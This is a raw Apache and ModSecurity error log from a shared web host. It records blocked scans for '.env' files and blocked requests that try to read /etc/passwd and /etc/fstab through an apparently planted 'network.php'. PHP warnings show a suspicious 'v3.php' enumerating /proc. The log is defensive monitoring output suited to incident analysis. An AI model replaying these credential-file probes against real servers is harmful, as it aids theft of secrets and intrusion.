[Mon May 11 20:30:02.064528 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.example"] [unique_id "agIgKpYn-x0CHsbEbP2kowAAAIM"]
[Mon May 11 20:30:02.064828 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agIgKpYn-x0CHsbEbP2kowAAAIM"]
[Mon May 11 20:30:02.093463 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/core/.env"] [unique_id "agIgKpYn-x0CHsbEbP2kpAAAAIM"]
[Mon May 11 20:30:02.093690 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/core/.env"] [unique_id "agIgKpYn-x0CHsbEbP2kpAAAAIM"]
[Mon May 11 20:30:02.093992 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agIgKpYn-x0CHsbEbP2kpAAAAIM"]
[Mon May 11 20:30:02.123680 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/app/.env"] [unique_id "agIgKpYn-x0CHsbEbP2kpgAAAIM"]
[Mon May 11 20:30:02.123843 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/app/.env"] [unique_id "agIgKpYn-x0CHsbEbP2kpgAAAIM"]
[Mon May 11 20:30:02.124109 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agIgKpYn-x0CHsbEbP2kpgAAAIM"]
[Mon May 11 20:30:02.442323 2026] [autoindex:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 20:30:02.469629 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/dev/.env"] [unique_id "agIgKpYn-x0CHsbEbP2kqAAAAIM"]
[Mon May 11 20:30:02.469841 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/dev/.env"] [unique_id "agIgKpYn-x0CHsbEbP2kqAAAAIM"]
[Mon May 11 20:30:02.470124 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agIgKpYn-x0CHsbEbP2kqAAAAIM"]
[Mon May 11 20:30:30.499576 2026] [security2:error] [pid 1502013:tid 1502046] [client 43.155.195.141:33496] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/wp-content/uploads/2023/08/muzungu_2661bfc3-0c04-448c-a8b0-06711a3367d8_943x-768x768.webp"] [unique_id "agIgRpYn-x0CHsbEbP2kwwAAAJQ"]
[Mon May 11 20:30:46.335219 2026] [security2:error] [pid 1516058:tid 1516097] [client 43.166.7.113:52832] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIgViMeXtzav-mi9SynXgAAAMc"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https://pencakeworks.com
[Mon May 11 20:31:18.694309 2026] [security2:error] [pid 1516058:tid 1516107] [client 43.159.46.41:42826] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/envie-de-savoir/"] [unique_id "agIgdiMeXtzav-mi9SyngQAAANE"]
[Mon May 11 20:31:24.885310 2026] [ssl:error] [pid 1501883:tid 1501906] (EAI 2)Name or service not known: [client 17.246.15.26:32972] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:31:24.885904 2026] [ssl:error] [pid 1501883:tid 1501906] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/60/task/60/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/60/task/60/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/60/task/60/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/60/task/60/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/60/task/60/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/60/task/60/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:31:27.923175 2026] [security2:error] [pid 1502013:tid 1502046] [client 150.109.21.93:41076] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/filature/"] [unique_id "agIgf5Yn-x0CHsbEbP2lCgAAAJQ"]
PHP Warning:  filesize(): stat failed for /proc/1704816/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:31:35.059777 2026] [security2:error] [pid 1501883:tid 1501897] [client 123.54.56.88:47021] ModSecurity: Warning. Matched phrase "user-agent:" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "33"] [id "913100"] [rev "2"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: user-agent: found within REQUEST_HEADERS:User-Agent: user-agent:mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agIghzP5Q_-MBliRCAxfMAAAAAw"], referer: https://www.tchatbooster.com/
[Mon May 11 20:31:35.061796 2026] [security2:error] [pid 1501883:tid 1501897] [client 123.54.56.88:47021] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agIghzP5Q_-MBliRCAxfMAAAAAw"], referer: https://www.tchatbooster.com/
[Mon May 11 20:31:40.505781 2026] [security2:error] [pid 1501883:tid 1501897] [client 123.54.56.88:47021] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Found User-Agent associated with security scanner"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agIghzP5Q_-MBliRCAxfMAAAAAw"], referer: https://www.tchatbooster.com/
[Mon May 11 20:31:51.618175 2026] [security2:error] [pid 1516058:tid 1516090] [client 43.167.241.46:42834] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "totalcloud.fr"] [uri "/"] [unique_id "agIglyMeXtzav-mi9SynnQAAAMA"]
[Mon May 11 20:31:51.620720 2026] [autoindex:error] [pid 1516058:tid 1516090] [client 43.167.241.46:42834] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 20:32:48.267126 2026] [security2:error] [pid 1501883:tid 1501888] [client 43.163.5.216:60216] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "jeanboyault.fr"] [uri "/"] [unique_id "agIg0DP5Q_-MBliRCAxfhwAAAAM"]
[Mon May 11 20:32:49.737282 2026] [security2:error] [pid 1501883:tid 1501887] [client 43.163.5.216:51854] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "jeanboyault.fr"] [uri "/"] [unique_id "agIg0TP5Q_-MBliRCAxfiwAAAAI"], referer: http://jeanboyault.fr
[Mon May 11 20:32:57.425288 2026] [security2:error] [pid 1501831:tid 1501854] [client 43.163.5.216:57098] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agIg2VNddpkriGUb6ZVu-AAAARU"], referer: https://jeanboyault.fr/
[Mon May 11 20:33:03.112905 2026] [ssl:error] [pid 1516058:tid 1516092] (EAI 2)Name or service not known: [client 54.174.58.226:45510] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:33:03.113283 2026] [ssl:error] [pid 1516058:tid 1516092] AH01941: stapling_renew_response: responder error
[Mon May 11 20:33:03.404439 2026] [ssl:error] [pid 1501883:tid 1501889] (EAI 2)Name or service not known: [client 54.174.58.241:26423] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:33:03.404589 2026] [ssl:error] [pid 1501883:tid 1501889] AH01941: stapling_renew_response: responder error
[Mon May 11 20:33:04.118664 2026] [ssl:error] [pid 1511173:tid 1511178] (EAI 2)Name or service not known: [client 54.174.58.242:8531] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:33:04.118800 2026] [ssl:error] [pid 1511173:tid 1511178] AH01941: stapling_renew_response: responder error
[Mon May 11 20:33:04.310079 2026] [ssl:error] [pid 1501883:tid 1501908] (EAI 2)Name or service not known: [client 54.174.58.224:4873] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:33:04.310121 2026] [ssl:error] [pid 1501883:tid 1501908] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/657/task/657/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/657/task/657/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/657/task/657/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/657/task/657/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/657/task/657/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/657/task/657/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/203/task/203/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/203/task/203/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/203/task/203/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/203/task/203/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/203/task/203/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/203/task/203/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:33:20.189493 2026] [:error] [pid 1502013:tid 1502048] [client 144.76.19.157:37688] File does not exist: /home/totalcloud/public_html/index.php
PHP Warning:  filesize(): stat failed for /proc/204/task/204/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/204/task/204/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/204/task/204/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/204/task/204/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/204/task/204/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/204/task/204/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:33:50.482448 2026] [:error] [pid 1534836:tid 1534873] [client 138.19.158.46:53891] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:34:48.026052 2026] [security2:error] [pid 1502013:tid 1502058] [client 43.157.158.178:34576] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/diagnostic-pre-cession/"] [unique_id "agIhSJYn-x0CHsbEbP2l-AAAAIg"]
[Mon May 11 20:35:04.002719 2026] [security2:error] [pid 1502013:tid 1502036] [client 101.32.128.113:56422] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agIhWJYn-x0CHsbEbP2mDAAAAIc"]
[Mon May 11 20:35:08.716234 2026] [security2:error] [pid 1501883:tid 1501892] [client 216.73.216.110:18655] ModSecurity: Warning. Matched phrase "etc/fstab" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/fstab found within ARGS:filesrc: /etc/fstab,v"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIhXDP5Q_-MBliRCAxgjwAAAAc"]
[Mon May 11 20:35:08.717510 2026] [security2:error] [pid 1501883:tid 1501892] [client 216.73.216.110:18655] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIhXDP5Q_-MBliRCAxgjwAAAAc"]
[Mon May 11 20:35:08.807951 2026] [security2:error] [pid 1501883:tid 1501892] [client 216.73.216.110:18655] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIhXDP5Q_-MBliRCAxgjwAAAAc"]
[Mon May 11 20:35:26.178167 2026] [security2:error] [pid 1501883:tid 1501906] [client 216.73.216.110:7933] ModSecurity: Warning. Matched phrase "etc/passwd" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/passwd found within ARGS:filesrc: /etc/passwd.nouids.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIhbjP5Q_-MBliRCAxgqgAAABU"]
[Mon May 11 20:35:26.179087 2026] [security2:error] [pid 1501883:tid 1501906] [client 216.73.216.110:7933] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIhbjP5Q_-MBliRCAxgqgAAABU"]
